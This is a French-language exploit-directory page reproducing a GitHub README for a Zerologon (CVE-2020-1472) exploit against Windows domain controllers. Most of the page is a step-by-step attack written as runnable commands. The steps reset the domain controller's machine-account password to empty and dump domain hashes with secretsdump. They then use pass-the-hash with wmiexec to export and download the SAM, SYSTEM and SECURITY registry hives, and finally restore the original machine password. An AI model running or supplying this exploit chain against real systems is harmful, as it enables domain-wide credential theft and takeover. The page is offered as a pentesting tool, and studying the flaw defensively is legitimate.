Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2020-1472 — Exploit pour CVE-2020-1472 (Zerologon) qui réinitialise le mot de passe du compte machine du contrôleur de domaine, permettant le vidage d'identifiants et l'escalade de privilèges vers administrateur de domaine. | Kitploit
Outils/GitHubGitHub/shanfenglan/cve-2020-1472
Escalade de PrivilègesAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationMouvement LatéralTests d'Intrusion
GitHubshanfenglan/cve-2020-1472

cve-2020-1472

Exploit pour CVE-2020-1472 (Zerologon) qui réinitialise le mot de passe du compte machine du contrôleur de domaine, permettant le vidage d'identifiants et l'escalade de privilèges vers administrateur de domaine.

Voir le dépôt
2il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

cve-2020-1472

@toc

Principe de la vulnérabilité

Le principe est assez complexe. Si vous êtes intéressé, vous pouvez consulter l'article sur le lien suivant : https://www.freebuf.com/articles/system/249860.html

Exploitation

1. Modifier le fichier impacket.dcerpc.v5.nrpc

Il faut utiliser le fichier https://github.com/SecureAuthCorp/impacket/edit/master/impacket/dcerpc/v5/nrpc.py pour remplacer le fichier nrpc local. Le chemin de stockage du fichier nrpc local est : C:\Users\Administrator\AppData\Local\Programs\Python\Python38\Lib\site-packages\impacket\dcerpc\v5\nrpc.py

2. Vider le mot de passe du compte machine yukong$

python cve-2020-1472-exploit.py nom_du_compte_machine ip ici description de l'image Et on constate que le mot de passe du compte machine a été vidé, 31dc... représente un mot de passe vide. ici description de l'image

Méthodes pour obtenir le compte machine ou le nom netbios de l'autre machine :

  1. net view Ajoutez $ à ce nom de serveur pour obtenir le nom de la machine, par exemple lisi$ ou yukong$.
  1. nbtstat -A ip ici description de l'image Il existe plusieurs méthodes pour déterminer l'ip du contrôleur de domaine, par exemple :
  2. Voir les hôtes ayant le port 53 ouvert
  3. net time renvoie le nom d'hôte du contrôleur de domaine, puis ping
  4. La commande systeminfo affiche la valeur du domaine, ping pour obtenir l'ip du contrôleur de domaine
  5. Voir le DNS de votre propre hôte

3. Lire le mot de passe administrateur

python secretsdump.py test.com/[email protected] -no-pass ici description de l'image On constate qu'il est possible d'utiliser le compte machine avec mot de passe vide pour lire le hash des utilisateurs sur le contrôleur de domaine.

4. Télécharger le fichier sam de la cible pour préparer la restauration du mot de passe machine

python wmiexec.py -hashes :3dbde697d71690a769204beb12283678 test/[email protected] reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SECURITY security.save

get system.save get sam.save get security.save

del /f system.save del /f sam.save del /f security.save

exit

ici description de l'image Une fois l'exécution terminée, les fichiers téléchargés se trouvent dans le dossier où se trouve le script wmiexec : ici description de l'image

python secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 test.com/[email protected] -use-vss Cette commande a échoué

5. Cracker le fichier sam pour voir l'ancien mot de passe machine

python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL ici description de l'image Sauvegardez le mot de passe dans le cercle rouge, c'est l'ancien mot de passe machine, c'est-à-dire aad3b435b51404eeaad3b435b51404ee:999699ceadecae87fef9a2040ef2213a.

6. Réinitialiser le mot de passe du compte machine yukong$

python reinstall_original_pw.py yukong$ 192.168.124.142 999699ceadecae87fef9a2040ef2213a ici description de l'image

7. Vérifier si le mot de passe a été restauré avec succès

python secretsdump.py test.com/administrator:[email protected] -just-dc-user yukong$ python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678 test/[email protected] -just-dc-user yukong$ ici description de l'image On constate que la restauration a réussi.

Télécharger l’outil